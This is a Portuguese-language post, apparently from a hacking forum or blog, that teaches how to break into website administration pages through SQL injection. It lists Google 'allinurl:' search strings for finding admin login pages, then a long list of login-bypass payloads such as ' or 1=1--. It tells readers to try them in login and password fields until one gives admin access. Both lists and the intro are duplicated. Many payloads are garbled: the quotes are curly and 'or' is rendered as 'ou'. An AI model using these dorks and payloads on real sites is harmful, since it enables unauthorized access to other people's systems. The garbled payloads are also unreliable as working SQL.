SQL injection - método de inserção de strings no banco de dados do servidor - podendo assim liberar os cookies e conseqüentemente a permissão de administrador.
Bem devido a alguns erros em banco de dados dos servidores é possível, ainda hoje, encontrar esse tipo devulnerabilidade.SQL Injection vem de injeção de SQL através de strings em campos de login ou senha, depedendo da página vulnerável. Um aliado para descobrir sites com essa vulnerabilidade é o famoso Google que permite pesquisar por páginas visadas a campos de logins
isso nao significa que essas paginas já estejam vulneraveis ok.
para pesquisarmos no google precisamo de um comando chamado allinurl.
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.
Bem devido a alguns erros em banco de dados dos servidores é possível, ainda hoje, encontrar esse tipo devulnerabilidade.SQL Injection vem de injeção de SQL através de strings em campos de login ou senha, depedendo da página vulnerável. Um aliado para descobrir sites com essa vulnerabilidade é o famoso Google que permite pesquisar por páginas visadas a campos de logins
isso nao significa que essas paginas já estejam vulneraveis ok.
para pesquisarmos no google precisamo de um comando chamado allinurl.
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.
# Strings:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
Agora é só testarmos strings nos campos de logins das paginas de admin.
a mesma string usada no login deve ser usada no campo de senha.
abaixo uma lista de strings:
b’ or ‘ 1=’
‘ or ‘1
‘ or ‘|
‘ or ‘a’='a
‘ or ”=’
‘ or 1=1–
‘) or (’a'=’a
‘ or ‘1'=’1
admin ‘ - -
‘ ou 0=0 –
“ou 0=0 –
ou 0=0 –
‘ ou 0=0 #
“ou 0=0 #
ou 0=0 #
‘ ou ‘ x’='x
“ou” x”=”x
‘) ou (’ x’='x
‘ ou 1=1 –
“ou 1=1 –
ou 1=1 –
‘ ou a=a –
“ou” a”=”a
‘) ou (’ a’='a
“) ou (”a”=”a
hi “ou” a”=”a
hi “ou 1=1 –
hi ‘ ou 1=1 –
hi ‘ ou ‘ a’='a
hi ‘) ou (’ a’='a
hi”) ou (”a”=”a
‘ or ‘x’='x
‘ or ‘1
‘ or ‘|
‘ or ‘a’='a
‘ or ”=’
‘ or 1=1–
‘) or (’a'=’a
‘ or ‘1'=’1
admin ‘ - -
‘ ou 0=0 –
“ou 0=0 –
ou 0=0 –
‘ ou 0=0 #
“ou 0=0 #
ou 0=0 #
‘ ou ‘ x’='x
“ou” x”=”x
‘) ou (’ x’='x
‘ ou 1=1 –
“ou 1=1 –
ou 1=1 –
‘ ou a=a –
“ou” a”=”a
‘) ou (’ a’='a
“) ou (”a”=”a
hi “ou” a”=”a
hi “ou 1=1 –
hi ‘ ou 1=1 –
hi ‘ ou ‘ a’='a
hi ‘) ou (’ a’='a
hi”) ou (”a”=”a
‘ or ‘x’='x
teste varias strings ate acertar uma que de uma confusao no banco de dados do servidor
assim te dando acesso a pagina da adiministração.
Comment